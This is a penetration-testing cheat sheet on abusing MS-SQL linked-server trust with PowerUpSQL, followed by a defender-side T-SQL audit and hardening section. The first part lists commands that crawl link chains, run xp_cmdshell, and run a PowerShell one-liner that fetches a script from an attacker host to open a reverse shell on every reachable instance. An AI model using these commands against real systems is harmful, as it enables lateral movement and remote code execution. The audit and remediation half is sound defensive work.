ABUSING MS-SQL TRUST
Enumerate MS-SQL instances in the current domain that the current user can read (via SPNs in AD):
Get-SQLInstanceDomain

Get detailed information about every reachable MS-SQL instance in the current domain:
Get-SQLInstanceDomain | Get-SQLServerInfo

List all linked servers (chain links) of every reachable MS-SQL instance in the current domain:
Get-SQLInstanceDomain | Get-SQLServerLink

List the linked servers of a specific MS-SQL instance:
Get-SQLServerLink -Instance <MS-SQL INSTANCE>

Crawl the chain of linked servers starting from a specific MS-SQL instance:
Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE>

Execute an arbitrary SQL query on every instance reached while crawling the links:
Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query "<QUERY>"

Execute a whoami command through xp_cmdshell on every instance reached while crawling (only succeeds where xp_cmdshell is enabled and the link login has the rights to use it):
Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query "exec master..xp_cmdshell 'whoami'"

Trigger a reverse shell on every crawled instance where command execution is possible:
Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://<IP>/Invoke-PowerShellTcp.ps1'')"'
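The crawl above works because of three server-side conditions: a linked server exists, the link has RPC Out enabled so remote procedures can be executed across it, and the login the link maps to is privileged enough (often sysadmin) to enable or call xp_cmdshell on the far side. The T-SQL below is an added defender-side audit, not part of this cheat sheet or of PowerUpSQL; it reads the same catalog views a crawler relies on, then applies the corresponding hardening. It assumes the account running it has sysadmin (or at least VIEW ANY DEFINITION) on the instance; <LINK_NAME>, <LOCAL_LOGIN>, <REMOTE_LOW_PRIV> and <PASSWORD> are placeholders to be filled from the audit output.

```sql
-- Added defender-side audit of linked-server trust (not from the original page or PowerUpSQL).
-- Run on each instance found in the domain; requires sysadmin or VIEW ANY DEFINITION.

-- 1. Which outbound links exist, and can they execute remote procedures?
--    is_rpc_out_enabled = 1 is what lets a crawler run commands across the link.
SELECT s.name                   AS linked_server,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       s.modify_date
FROM   sys.servers AS s
WHERE  s.is_linked = 1
ORDER  BY s.name;

-- 2. How are logins mapped across each link?
--    local_principal_id = 0 is the default mapping for "all other logins".
--    A fixed remote_name (uses_self_credential = 0) means every local login that can
--    reach the link runs as that one account on the far side; if that account is
--    sysadmin there, the link is a privilege-escalation path.
SELECT s.name                                  AS linked_server,
       COALESCE(sp.name, '<all other logins>') AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM   sys.linked_logins AS ll
JOIN   sys.servers       AS s  ON s.server_id    = ll.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE  s.is_linked = 1
ORDER  BY s.name, local_login;

-- 3. Is xp_cmdshell enabled on this instance? (value_in_use = 1 means enabled)
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';

-- 4. Remediation for the findings above.

-- Disable xp_cmdshell, then hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- Turn off RPC Out on a link that only needs to be queried, never executed against.
-- <LINK_NAME> is a placeholder for a linked_server value from query 1.
EXEC sp_serveroption @server = N'<LINK_NAME>', @optname = N'rpc out', @optvalue = N'false';

-- Replace a fixed sysadmin mapping with a least-privilege remote login for one local login.
-- <LINK_NAME>, <LOCAL_LOGIN>, <REMOTE_LOW_PRIV> and <PASSWORD> are placeholders.
EXEC sp_addlinkedsrvlogin
     @rmtsrvname  = N'<LINK_NAME>',
     @useself     = N'FALSE',
     @locallogin  = N'<LOCAL_LOGIN>',
     @rmtuser     = N'<REMOTE_LOW_PRIV>',
     @rmtpassword = N'<PASSWORD>';
```

Run queries 1 to 3 on every instance, not just the one an attacker would start from: a crawl follows links outward, so a single over-privileged, RPC-Out-enabled link anywhere in the graph exposes everything behind it. Re-run the audit after remediation and keep the output as a baseline, since a newly created link or a re-enabled xp_cmdshell will show up as a diff against it.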